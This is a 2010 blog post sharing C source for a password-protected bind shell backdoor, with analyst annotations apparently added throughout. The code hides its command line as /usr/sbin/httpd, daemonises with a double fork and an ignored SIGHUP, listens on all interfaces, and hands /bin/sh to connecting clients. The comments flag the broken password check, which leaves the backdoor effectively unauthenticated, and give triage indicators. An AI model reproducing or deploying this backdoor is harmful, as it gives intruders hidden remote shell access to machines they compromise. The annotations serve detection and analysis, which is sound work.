Friday, July 16, 2010

Bindshell with password

Ngerti sendiri lah ini untuk apa. =))
/*
 * (original source forgotten)
 * edited by zam
 * - Hotline -
 */


/* TCP port the listener binds to (used in htons(PORT) in main). */
#define PORT 1234
/* Secret compared against the first bytes a client sends.
 * NOTE(review): the value looks masked on the page; confirm against a real sample. */
#define PASS "******"
/* Disabled prompt: with this commented out, the listener sends nothing until the
 * client has spoken first. */
//#define PROMPT "hehe!\n"
/* Banner written to the client once the password check passes. It is sent with
 * sizeof(SIP), so the bytes on the wire are the 10 visible characters plus the
 * trailing NUL: a fixed string that a network or memory signature can match. */
#define SIP "[zam]-OK!\n"
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* soc_des: listening socket; soc_cli: accepted client socket; soc_rc: return
 * code of bind()/listen(); soc_len: address length handed to accept();
 * server_pid: result of the per-connection fork(); cli_pid: set from getpid()
 * in main and not read again in this file.
 * NOTE(review): soc_len is an int but is passed by address to accept(), which
 * takes a socklen_t pointer. */
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
/* Local address the listener binds to (filled in main). */
struct sockaddr_in serv_addr; 
/* Peer address filled in by accept(); never logged or checked in this file. */
struct sockaddr_in client_addr;
/* Receives the client's password attempt. File-scope, so zero-initialised at
 * start, but read() in main may fill all 50 bytes and leave no terminator. */
char login[50];

/*
 * Password-gated bind shell, annotated for analysts.
 *
 * Behaviour visible in this function:
 *   - overwrites its own argv so the command line reads "/usr/sbin/httpd";
 *   - binds a TCP listener on PORT on every local address (INADDR_ANY);
 *   - detaches with two fork() calls, setpgrp() and an ignored SIGHUP;
 *   - for each connection, reads up to sizeof(login) bytes, compares them with
 *     PASS, writes SIP, then replaces the process with /bin/sh wired to the socket.
 *
 * Triage pointers that follow from the code: a process whose command line says
 * /usr/sbin/httpd while its on-disk executable is something else (for example
 * via /proc/<pid>/exe on Linux); a /bin/sh whose descriptors 0, 1 and 2 are the
 * same TCP socket; an unexpected listener on PORT; the SIP banner on the wire.
 *
 * argc/argv are used only to be overwritten. The function never returns
 * normally: every path ends in exit() or execl().
 */
int main (int argc, char *argv[])
{
 int i;
 /* Blank every argument string in place so the original command line is not
  * visible to tools that read it from process memory. */
 for(i=0;i<argc;i++) {
  memset(argv[i],'\x0',strlen(argv[i]));
 };
 /* Masquerade as a web server process. The 16-byte copy (15 characters plus
  * NUL) is not checked against the original length of argv[0], so a shorter
  * original name means the write runs past that string. */
 strcpy(argv[0],"/usr/sbin/httpd");
 soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 /* Socket and bind failures exit with -1; every later exit uses 0. */
 if (soc_des == -1) 
  exit(-1); 
 bzero((char *) &serv_addr, sizeof(serv_addr));
 serv_addr.sin_family = AF_INET; 
 /* INADDR_ANY: the listener is reachable on all interfaces, not only loopback. */
 serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
 serv_addr.sin_port = htons(PORT);
 soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
 if (soc_rc != 0) 
  exit(-1);
 /* First fork: the launching process exits at once, so the shell that started
  * the program sees it finish. */
 if (fork() != 0) 
  exit(0); 
 /* New process group plus ignored SIGHUP: the survivor is not taken down when
  * the launching terminal closes. */
 setpgrp();  
 signal(SIGHUP, SIG_IGN); 
 /* Second fork: only the grandchild continues, and it reaches listen(). */
 if (fork() != 0) 
  exit(0); 
 soc_rc = listen(soc_des, 5);
 if (soc_rc != 0) 
  exit(0); 
 while (1) { 
  soc_len = sizeof(client_addr);
  soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
  if (soc_cli < 0) 
   exit(0); 
  /* cli_pid is assigned here and not used afterwards. */
  cli_pid = getpid(); 
  server_pid = fork(); 
  /* fork() returns non-zero in the parent (and -1 on failure), so it is the
   * process that was listening that handles the client and becomes the shell.
   * The new child (return value 0) skips this branch, closes soc_cli and loops
   * back to accept(). The listener's pid therefore changes with every
   * connection, and the shell keeps soc_des open because it is never closed on
   * this path. */
  if (server_pid != 0) { 
   //write(soc_cli, PROMPT, sizeof(PROMPT));
   /* Single read, return value unchecked; up to 50 bytes with no guaranteed
    * terminator. */
   read(soc_cli, login, sizeof(login));
   /* NOTE(review): strcmp() is given three arguments here and only a negative
    * result is rejected, so this is not an equality test against PASS. For
    * triage, treat the listener as effectively unauthenticated. */
   if(strcmp(login, PASS, sizeof(PASS)) < 0)
    exit(0);
   write(soc_cli, SIP, sizeof(SIP));
   /* Point stdin, stdout and stderr at the client socket so the shell's I/O
    * goes over the connection. */
   dup2(soc_cli,0); 
   dup2(soc_cli,1); 
   dup2(soc_cli,2);
   /* Replaces this process image with /bin/sh (argv[0] "sh"). The two lines
    * below run only if execl() fails. */
   execl("/bin/sh","sh",(char *)0); 
   close(soc_cli); 
   exit(0); 
  }
  /* Child path: drop its copy of the client socket and go back to accept(). */
  close(soc_cli);
 }
}